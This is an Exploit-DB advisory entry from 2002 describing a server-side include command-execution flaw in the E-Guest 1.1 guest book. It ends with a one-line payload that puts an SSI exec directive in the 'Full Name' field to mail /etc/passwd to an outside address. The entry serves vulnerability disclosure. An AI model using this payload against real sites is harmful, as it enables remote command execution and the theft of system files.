E-Guest 1.1 - Server Side Include Arbitrary Command Execution

EDB-ID:

21586

Author:

DownBload

Type:

remote

Platform:

Linux

Published:

2002-06-30

source: https://www.securityfocus.com/bid/5129/info

E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems.

E-Guest does not adequately sanitize user-supplied input in guest book entries. Because of this, it is possible to pass along commands via server-side includes that could allow a remote user to execute commands on the local host.

Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->